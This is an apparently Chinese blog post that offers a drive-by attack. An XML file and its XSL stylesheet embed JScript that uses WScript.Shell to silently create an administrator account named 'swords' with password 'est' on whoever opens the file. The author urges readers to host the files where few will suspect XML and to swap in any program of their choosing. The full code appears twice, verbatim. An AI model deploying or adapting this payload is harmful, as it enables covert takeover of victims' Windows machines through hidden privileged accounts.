本文介绍了一种利用XML与XSLT文件进行恶意操作的方法,通过将特定脚本嵌入到XSL样式表中,实现创建系统账户的目的。此方法默认支持JS和VBS脚本。
用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.
这个程序加了一个用户为 swords,密码为est的超级管理员账号。
swords.xml
<?xml version="1.0" encoding="GB2312"?>
<?xml-stylesheet type="text/xsl" href="swords.xsl"?>
<name>I am swords,I am admin!</name>
swords.xsl
<?xml version="1.0" encoding="gb2312"?>
<xsl:stylesheet xmlns:xsl=" http://www.w3.org/TR/WD-xsl">
<xsl:template match="/">
<html>
<body>
<xsl:value-of select="name" />
<xsl:script>
function run()
{
var wsh;
var wsh = new ActiveXObject("WScript.Shell");
wsh.run( "net user swords est /add",0);
wsh.run( "net localgroup administrators swords /add",0);
wsh.run( "cmd.exe /c echo test!");
}
</xsl:script>
<xsl:eval>run()</xsl:eval>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
这个程序加了一个用户为 swords,密码为est的超级管理员账号。
swords.xml
<?xml version="1.0" encoding="GB2312"?>
<?xml-stylesheet type="text/xsl" href="swords.xsl"?>
<name>I am swords,I am admin!</name>
swords.xsl
<?xml version="1.0" encoding="gb2312"?>
<xsl:stylesheet xmlns:xsl=" http://www.w3.org/TR/WD-xsl">
<xsl:template match="/">
<html>
<body>
<xsl:value-of select="name" />
<xsl:script>
function run()
{
var wsh;
var wsh = new ActiveXObject("WScript.Shell");
wsh.run( "net user swords est /add",0);
wsh.run( "net localgroup administrators swords /add",0);
wsh.run( "cmd.exe /c echo test!");
}
</xsl:script>
<xsl:eval>run()</xsl:eval>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
